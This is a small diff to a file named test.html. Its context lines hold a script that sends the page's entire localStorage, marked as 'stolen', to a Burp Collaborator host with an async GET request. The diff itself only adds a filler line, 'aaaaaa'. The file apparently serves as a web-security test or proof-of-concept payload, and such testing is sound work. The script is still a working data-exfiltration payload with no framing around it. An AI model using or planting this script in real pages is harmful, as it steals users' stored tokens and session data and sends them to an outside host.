--- a/test.html
+++ b/test.html
@@ -1,3 +1,5 @@
+aaaaaa 
+
 <script>var theUrl = ("http://qkezt6sje655wi5qss1sjkzeq5wykn.burpcollaborator.net?stolen=+" + JSON.stringify(localStorage))
 function httpGetAsync(theUrl, callback)
 {
